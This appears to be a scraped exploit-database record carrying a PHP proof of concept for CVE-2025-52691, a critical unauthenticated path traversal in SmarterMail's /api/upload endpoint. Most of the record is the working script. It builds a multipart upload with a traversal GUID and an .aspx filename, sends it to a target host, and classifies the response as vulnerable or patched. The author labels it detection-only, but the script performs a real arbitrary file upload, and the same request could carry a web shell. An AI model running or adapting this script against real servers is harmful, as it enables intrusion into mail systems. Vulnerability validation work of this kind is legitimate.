{“lastseen”:”2026-02-19T16:29:03″,”description”:”This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the \/api\/upload endpoint, leveraging a path traversal condition in the…”,”published”:”2026-02-19T00:00:00″,”modified”:”2026-02-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 SmarterMail 16.3.6989.16341 Path Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:215889″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-52691″],”sourceData”:”=============================================================================================================================================\\n | # Title : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.smartertools.com\/ |\\n =============================================================================================================================================\\n \\n [+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail. \\n It sends a crafted multipart upload request to the \/api\/upload endpoint, leveraging a path traversal \\n \\t\\t\\t condition in the contextData GUID to determine whether the target is vulnerable. \\n \\t\\t\\t The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable, \\n \\t\\t\\t Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation. \\n It is intended solely for validation and security assessment purposes.\\n \\n [+] POC : php poc.php -H https:\/\/target.com\\n \\n \\u003c?php\\n \\n error_reporting(E_ALL);\\n ini_set(‘display_errors’, 0);\\n \\n $banner = \\u003c\\u003c\\u003cBANNER\\n \\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n watchTowr-vs-SmarterMail-CVE-2025-52691.php\\n (*) CVE-2025-52691 Detection Artifact Generator\\n \\n BANNER;\\n \\n function generateRandomName(int $length = 6): string {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’;\\n $out = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $out .= $chars[random_int(0, strlen($chars) – 1)];\\n }\\n return $out;\\n }\\n \\n function dag(string $host): void {\\n \\n $name = generateRandomName();\\n $url = $host . ‘api\/upload’;\\n $boundary = ‘—-WebKitFormBoundary’ . bin2hex(random_bytes(8));\\n $data = \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”context\\\\\\”\\\\r\\\\n\\\\r\\\\nattachment\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”resumableIdentifier\\\\\\”\\\\r\\\\n\\\\r\\\\nfakeID\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”resumableFilename\\\\\\”\\\\r\\\\n\\\\r\\\\nfakefile.aspx\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”contextData\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{\\\\\\”guid\\\\\\”:\\\\\\”dag\/..\/..\/{$name}\\\\\\”}\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”whatever\\\\\\”; filename=\\\\\\”fake.jpg\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”Detection Artifact Generator\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $data,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_HTTPHEADER =\\u003e [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”Content-Length: \\” . strlen($data)\\n ],\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 15,\\n ]);\\n \\n $response = curl_exec($ch);\\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($response === false || empty($response)) {\\n echo \\”[!] Request failed\\\\n\\”;\\n return;\\n }\\n \\n $json = json_decode($response, true);\\n \\n if (is_string($json)) {\\n $json = json_decode($json, true);\\n }\\n \\n if (!is_array($json)) {\\n echo \\”[+\/-] UNKNOWN MESSAGE – please verify manually\\\\n\\”;\\n return;\\n }\\n \\n if ($httpCode === 200 \\u0026\\u0026 isset($json[‘key’])) {\\n if (stripos($json[‘key’], $name) !== false) {\\n echo \\”[+] VULNERABLE – file \\” . basename($json[‘key’]) . \\” got uploaded\\\\n\\”;\\n return;\\n }\\n }\\n \\n if ($httpCode === 400 \\u0026\\u0026 ($json[‘message’] ?? ”) === ‘INVALID_GUID’) {\\n echo \\”[-] NOT VULNERABLE – patch applied (INVALID_GUID)\\\\n\\”;\\n return;\\n }\\n \\n echo \\”[+\/-] UNKNOWN MESSAGE – please verify manually\\\\n\\”;\\n }\\n \\n echo $banner;\\n \\n $options = getopt(\\”H:\\”, [\\”host:\\”]);\\n \\n if (!isset($options[‘H’]) \\u0026\\u0026 !isset($options[‘host’])) {\\n echo \\”Usage : php poc.php -H \\u003chost\\u003e\\\\n\\”;\\n echo \\”Example: php poc.php -H https:\/\/smartermail.lab\/\\\\n\\”;\\n exit(1);\\n }\\n \\n $host = rtrim($options[‘H’] ?? $options[‘host’], ‘\/’) . ‘\/’;\\n dag($host);\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215889″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215889\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-19T16:29:03″,”description”:”This PHP proof of concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail version 16.3.6989.16341. It sends a crafted multipart upload request to the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-41637","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n